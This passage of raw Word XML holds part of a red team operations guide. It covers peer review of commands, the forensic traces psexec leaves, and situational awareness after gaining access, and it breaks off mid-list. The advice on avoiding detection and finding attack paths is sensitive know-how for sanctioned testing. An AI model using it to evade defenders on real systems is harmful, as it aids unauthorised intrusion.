      </w:r>
      <w:hyperlink r:id="rId34" w:anchor="consult-with-peers" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DB26F69" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">No matter how long you have been performing IT or security, consult your peers before </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>taking action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>. This is especially true during exploitation and command and control setup. Simple mistakes often lead to Red Team discovery too early in the engagement. Look at the command below. The command will be run as part of a tool written to provide general SA on a Linux system. What should the output look like?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168C193" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>netstat –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>antb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6E13E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">The command above is a netstat command that can be executed on a Windows host. Linux does not have the "b" option and produces an "invalid option" response. Think about </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="208BF43F" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Have you ever typed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of ipconfig?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425DDF1" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Have you ever typed rm * in the wrong directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC04436" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Have you ever entered credentials only to discover they were "fat fingered" (after access error)? While these are oversimplifications, they represent the need for peer review on tools, C2, setup, execution, and even clean up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05A768" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>UNDERSTAND THE TOOLS AND TECHNOLOGIES USED</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:anchor="understand-the-tools-and-technologies-used" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15F407D1" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Understand the underlying technology of a tool or technique before using it on an event. Know how the tool or technique interacts with a target, what network traffic it may generate, and what traces it may leave behind. Knowing what a tool does is only one-third of the equation. What does that mean exactly? Let’s quickly look at a few questions and an example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC97E5" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What artifacts does the tool leave behind? - Are any files modified during execution?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC0429" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Are there tales in the network traffic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F855D0" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let’s look at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a commonly used tool, but not a recommended tool for Red Teaming a remote system) Depending on how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00D9E3" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copies a service file to the remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EB3C4AF" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enters a service key into the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>registry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="018D6B02" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a prefetch </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="294EE1E7" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates an entry in the Application Compatibility Cache - Creates a login </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="523D1AE8" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a profile folder for the remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D3E2045" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attempts to remove service file and key when exiting (not always successful)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368BB1A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens when using the –e option? –s option? How does this differ from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for PowerShell? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not a bad tool, and Red Team operators will use it. But... it is important to understand the IOCs generated by a tool. Getting caught due to a lack of tool understanding is not something any Red Team operators wants to experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEAB97" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PERFORM SITUATIONAL AWARENESS</w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:anchor="perform-situational-awareness" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10697CDA" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>After gaining access to a remote system perform situational awareness before moving on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E76521" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Understand the environment you are in (Is the target in scope?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F63B9" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What protections exist on the system or network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841AE03" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What are the risks of being caught and what attack paths does the system provide? - Are there pre-established connections to other network resources?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD8208" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Who is into the system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633237AF" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
